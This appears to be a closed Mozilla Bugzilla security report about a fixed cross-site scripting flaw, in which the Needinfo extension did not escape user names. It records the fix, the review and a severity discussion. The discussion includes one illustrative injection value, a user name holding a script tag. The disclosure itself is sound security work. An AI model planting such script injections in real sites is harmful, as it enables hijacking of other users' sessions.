Closed Bug 919357 Opened 6 years ago Closed 6 years ago

Needinfo extension does not escape user names

Categories

(bugzilla.mozilla.org :: Extensions, defect, critical)

Production
defect
Not set
critical

Tracking

()

RESOLVED FIXED

People

(Reporter: mail, Assigned: mail)

References

Details

(Keywords: regression, sec-high, wsec-xss)

Attachments

(1 file)

User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0 (Beta/Release)
Build ID: 20130917102605

Steps to reproduce:

1) Visit https://bugzilla.mozilla.org/show_bug.cgi?id=469018
2) Towards the bottom of the page, change the needinfo to the assignee


Actual results:

Displays 'Simon Green'


Expected results:

Displays 'Simon Green <sgreen@redhat.com>'
Marking this as a security bug, since it would not escape a user name that contained Javascript for example. This could lead to all sort of nasties.
Assignee: nobody → simon
Severity: normal → critical
Status: NEW → ASSIGNED
Depends on: 917483
Attachment #808358 - Flags: review?(glob)
Keywords: sec-critical
Attachment #808358 - Flags: review?(glob) → review+
Committing to: bzr+ssh://bjones%40mozilla.com@bzr.mozilla.org/bmo/4.2/
modified extensions/Needinfo/template/en/default/bug/needinfo.html.tmpl
Committed revision 9029.
Status: ASSIGNED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED
Depends on: 917577
No longer depends on: 917483
Flags: sec-bounty?
Keywords: regression, wsec-xss
How can we make this less likely to happen in the future? Have and use a combined htmljs filter? Get some lint thing to specifically check for both html and js escaping between <script> tags?

Gerv
Given the user interaction required I find it hard to rate this as sec-critical. Your best bet at pulling this off as an attack is to file a concerning but incomplete bug against your potential victim and hope they needinfo? the reporter rather than just ask in a comment. And do so without having initially noticed that your user name at the top of the bug report included "<script src=attack.js>" or whatever.
Keywords: sec-criticalsec-high
Flags: sec-bounty? → sec-bounty+
Group: bugzilla-security
Component: Extensions: Needinfo → Extensions
You need to log in before you can comment on or make changes to this bug.